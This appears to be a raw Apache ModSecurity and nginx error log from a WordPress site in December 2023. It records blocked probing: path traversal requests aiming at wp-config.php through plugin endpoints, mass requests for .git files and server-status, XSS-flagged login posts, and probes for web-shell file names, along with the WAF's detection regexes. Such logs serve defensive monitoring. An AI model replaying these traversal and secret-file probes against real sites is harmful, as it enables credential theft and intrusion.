"/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php"] [unique_id "ZWrqVQ3foCjRd8l2OkZ7PwAAAMo"] [Sat Dec 02 03:27:01.344410 2023] [:error] [pid 23871:tid 140215884691200] [client 37.139.53.67:40534] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "ZWrqVTTw0SF51YqyrqOd7QAAAAg"] [Sat Dec 02 03:27:01.455166 2023] [:error] [pid 23871:tid 140216023533312] [client 37.139.53.67:40536] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-license.php?file=..%2F..%2F%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-license.php"] [unique_id "ZWrqVTTw0SF51YqyrqOd7gAAAAA"] [Sat Dec 02 05:47:36.507645 2023] [:error] [pid 23871:tid 140215767193344] [client 185.220.101.175:42798] [client 185.220.101.175] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWsLSDTw0SF51YqyrqOeaQAAABY"] [Sat Dec 02 05:47:38.196480 2023] [:error] [pid 24358:tid 140215876298496] [client 185.243.218.89:42804] [client 185.243.218.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWsLSg3foCjRd8l2OkZ8ZAAAAMk"] [Sat Dec 02 16:51:00.033905 2023] [autoindex:error] [pid 23874:tid 140215834334976] [client 98.70.50.162:53152] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Dec 02 17:47:07.722265 2023] [:error] [pid 23873:tid 140215876298496] [client 2.58.56.43:53852] [client 2.58.56.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWuz6yUYSj4DVa63o8QINwAAAEk"] 2023/12/03 00:44:04 [error] 23733#23733: *28777 access forbidden by rule, client: 167.71.185.75, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:44:06 [error] 23733#23733: *28920 access forbidden by rule, client: 161.35.27.144, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:44:07 [error] 23733#23733: *28964 access forbidden by rule, client: 164.90.222.93, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/12/03 00:44:09 [error] 23733#23733: *29063 access forbidden by rule, client: 139.144.150.45, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:44:09 [error] 23733#23733: *29076 access forbidden by rule, client: 128.199.62.55, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:44:10 [error] 23733#23733: *29139 access forbidden by rule, client: 164.90.222.93, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Dec 03 00:44:21.301979 2023] [authz_core:error] [pid 24358:tid 140215834334976] [client 64.227.126.135:34396] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sun Dec 03 00:44:21.916212 2023] [authz_core:error] [pid 24358:tid 140215809156864] [client 139.59.182.142:34400] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sun Dec 03 00:44:23.339912 2023] [authz_core:error] [pid 23871:tid 140215876298496] [client 198.199.121.22:34410] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sun Dec 03 00:44:25.459276 2023] [authz_core:error] [pid 23871:tid 140215783978752] [client 165.22.74.203:34422] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/12/03 00:44:28 [error] 23734#23734: *29293 access forbidden by rule, client: 64.227.126.135, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/12/03 00:44:28 [error] 23734#23734: *29296 access forbidden by rule, client: 139.59.182.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/12/03 00:44:29 [error] 23734#23734: *29303 access forbidden by rule, client: 198.199.121.22, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/12/03 00:44:32 [error] 23733#23733: *29328 access forbidden by rule, client: 165.22.74.203, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/12/03 00:45:25 [error] 23734#23734: *29387 access forbidden by rule, client: 62.72.172.29, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:45:25 [error] 23733#23733: *29388 access forbidden by rule, client: 62.72.172.29, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:45:26 [error] 23734#23734: *29389 access forbidden by rule, client: 62.72.172.29, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/12/03 00:46:37 [error] 23733#23733: *29424 access forbidden by rule, client: 162.214.123.232, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/12/03 00:46:37 [error] 23734#23734: *29421 access forbidden by rule, client: 162.214.123.232, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/12/03 00:46:37 [error] 23733#23733: *29438 access forbidden by rule, client: 162.214.123.232, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/12/03 00:46:37 [error] 23733#23733: *29424 access forbidden by rule, client: 162.214.123.232, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/12/03 00:46:37 [error] 23733#23733: *29424 access forbidden by rule, client: 162.214.123.232, server: cpanel.investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/12/03 00:46:37 [error] 23733#23733: *29436 access forbidden by rule, client: 162.214.123.232, server: cpanel.investigacionperu.com, request: "GET /.git/logs/refs/stash HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/12/03 00:46:37 [error] 23733#23733: *29436 access forbidden by rule, client: 162.214.123.232, server: cpanel.investigacionperu.com, request: "GET /.git/logs/refs/remotes/origin/develop HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/12/03 00:46:38 [error] 23734#23734: *29546 access forbidden by rule, client: 162.214.123.232, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:46:38 [error] 23734#23734: *29549 access forbidden by rule, client: 162.214.123.232, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:46:39 [error] 23733#23733: *29600 access forbidden by rule, client: 162.214.123.232, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:46:39 [error] 23734#23734: *29598 access forbidden by rule, client: 162.214.123.232, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:46:40 [error] 23734#23734: *29550 access forbidden by rule, client: 162.214.123.232, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:46:40 [error] 23734#23734: *29550 access forbidden by rule, client: 162.214.123.232, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:46:40 [error] 23734#23734: *29550 access forbidden by rule, client: 162.214.123.232, server: mail.investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:46:40 [error] 23734#23734: *29550 access forbidden by rule, client: 162.214.123.232, server: mail.investigacionperu.com, request: "GET /.git/logs/refs/stash HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:46:41 [error] 23734#23734: *29550 access forbidden by rule, client: 162.214.123.232, server: mail.investigacionperu.com, request: "GET /.git/logs/refs/remotes/origin/develop HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:46:41 [error] 23734#23734: *29596 access forbidden by rule, client: 162.214.123.232, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:46:41 [error] 23734#23734: *29596 access forbidden by rule, client: 162.214.123.232, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:46:41 [error] 23734#23734: *29596 access forbidden by rule, client: 162.214.123.232, server: webmail.investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:46:41 [error] 23734#23734: *29596 access forbidden by rule, client: 162.214.123.232, server: webmail.investigacionperu.com, request: "GET /.git/logs/refs/stash HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:46:41 [error] 23734#23734: *29596 access forbidden by rule, client: 162.214.123.232, server: webmail.investigacionperu.com, request: "GET /.git/logs/refs/remotes/origin/develop HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:48:45 [error] 23734#23734: *29918 access forbidden by rule, client: 62.72.172.29, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:48:46 [error] 23734#23734: *29919 access forbidden by rule, client: 62.72.172.29, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/12/03 00:48:50 [error] 23734#23734: *29922 access forbidden by rule, client: 62.72.172.29, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:51:24 [error] 23734#23734: *30001 access forbidden by rule, client: 62.72.172.29, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/12/03 00:51:24 [error] 23734#23734: *30002 access forbidden by rule, client: 62.72.172.29, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/12/03 00:51:29 [error] 23733#23733: *30005 access forbidden by rule, client: 62.72.172.29, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Dec 03 05:46:09.042497 2023] [:error] [pid 8456:tid 140539844355840] [client 91.208.75.178:39600] [client 91.208.75.178] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWxccZ-3gpCSrxyXm67LxQAAAMI"] [Sun Dec 03 06:17:23.233755 2023] [:error] [pid 8183:tid 140539676501760] [client 178.20.55.182:40978] [client 178.20.55.182] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWxjwxAgylcoHxNQhAMxwwAAAJY"] [Sun Dec 03 06:19:41.164806 2023] [:error] [pid 8182:tid 140539735250688] [client 89.163.210.249:41006] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Sun Dec 03 06:20:50.328453 2023] [:error] [pid 8183:tid 140539852748544] [client 89.163.210.249:41046] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Sun Dec 03 08:02:44.755488 2023] [autoindex:error] [pid 8183:tid 140539810785024] [client 91.134.248.211:42806] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/midnight/index.php [Sun Dec 03 13:14:47.770510 2023] [autoindex:error] [pid 8182:tid 140539701679872] [client 192.185.81.173:49502] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php 2023/12/04 12:12:49 [error] 28880#28880: *44979 access forbidden by rule, client: 54.205.141.106, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Dec 04 19:20:08.613191 2023] [:error] [pid 13791:tid 140452460222208] [client 185.129.61.6:45368] [client 185.129.61.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZW5suDbVxTEouyoE22qBuAAAAMI"] [Mon Dec 04 19:59:15.665187 2023] [:error] [pid 13705:tid 140452292368128] [client 84.239.43.14:46618] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Dec 04 19:59:15.683341 2023] [:error] [pid 13705:tid 140452275582720] [client 84.239.43.14:46622] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Dec 05 02:30:21.690255 2023] [:error] [pid 21663:tid 140452292368128] [client 92.87.142.149:53998] [client 92.87.142.149] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-100"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/wp-content/mysql.sql"] [unique_id "ZW7RjSZ8XUqBZnbbyJh_igAAAlY"] [Tue Dec 05 08:15:56.234475 2023] [:error] [pid 32370:tid 139621553092352] [client 192.42.116.187:58574] [client 192.42.116.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZW8ijKLJXz0Q07tjKGZJ-wAAAIM"] [Wed Dec 06 00:47:34.921333 2023] [:error] [pid 551:tid 139621561485056] (12)Cannot allocate memory: [client 198.71.235.31:42468] couldn't create child process: /usr/local/sbin/suphp for /home/investig/public_html/wp-login.php [Wed Dec 06 05:44:34.089567 2023] [:error] [pid 10529:tid 140380318127872] [client 94.156.64.235:59418] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Dec 06 05:44:59.617066 2023] [autoindex:error] [pid 10529:tid 140380435625728] [client 94.156.64.235:59500] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:45:05.747242 2023] [:error] [pid 9588:tid 140380343305984] [client 94.156.64.235:59518] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Wed Dec 06 05:45:16.201747 2023] [:error] [pid 10529:tid 140380564088576] [client 94.156.64.235:59548] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell.php [Wed Dec 06 05:45:27.549776 2023] [:error] [pid 9588:tid 140380402054912] [client 94.156.64.235:59608] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Wed Dec 06 05:45:29.762528 2023] [:error] [pid 9590:tid 140380418840320] [client 94.156.64.235:59616] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Wed Dec 06 05:45:34.963058 2023] [autoindex:error] [pid 9589:tid 140380343305984] [client 94.156.64.235:59632] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:45:38.640343 2023] [autoindex:error] [pid 9589:tid 140380460803840] [client 94.156.64.235:59644] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:45:39.391872 2023] [autoindex:error] [pid 9590:tid 140380292949760] [client 94.156.64.235:59648] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:45:39.473350 2023] [:error] [pid 9588:tid 140380460803840] [client 94.156.64.235:59650] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Wed Dec 06 05:45:41.676490 2023] [:error] [pid 9590:tid 140380301342464] [client 94.156.64.235:59658] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Wed Dec 06 05:45:43.190891 2023] [autoindex:error] [pid 9590:tid 140380326520576] [client 94.156.64.235:59664] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:45:48.829706 2023] [:error] [pid 9590:tid 140380435625728] [client 94.156.64.235:59686] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/output.php [Wed Dec 06 05:45:50.973868 2023] [:error] [pid 9588:tid 140380385269504] [client 94.156.64.235:59694] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Wed Dec 06 05:46:01.184536 2023] [autoindex:error] [pid 10529:tid 140380435625728] [client 94.156.64.235:59726] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:46:03.475802 2023] [:error] [pid 9590:tid 140380368484096] [client 94.156.64.235:59734] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Dec 06 05:46:07.859414 2023] [:error] [pid 9590:tid 140380385269504] [client 94.156.64.235:59748] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Wed Dec 06 05:46:12.829399 2023] [:error] [pid 9588:tid 140380318127872] [client 94.156.64.235:59764] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/themes.php [Wed Dec 06 05:46:17.872992 2023] [:error] [pid 10529:tid 140380555695872] [client 94.156.64.235:59780] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-hudbud.php [Wed Dec 06 05:46:29.241951 2023] [:error] [pid 9590:tid 140380292949760] [client 94.156.64.235:59824] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-aespa.php [Wed Dec 06 05:46:36.310196 2023] [autoindex:error] [pid 10529:tid 140380452411136] [client 94.156.64.235:59846] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:46:46.519184 2023] [autoindex:error] [pid 9590:tid 140380435625728] [client 94.156.64.235:59880] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:46:59.076141 2023] [autoindex:error] [pid 9588:tid 140380410447616] [client 94.156.64.235:59920] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex 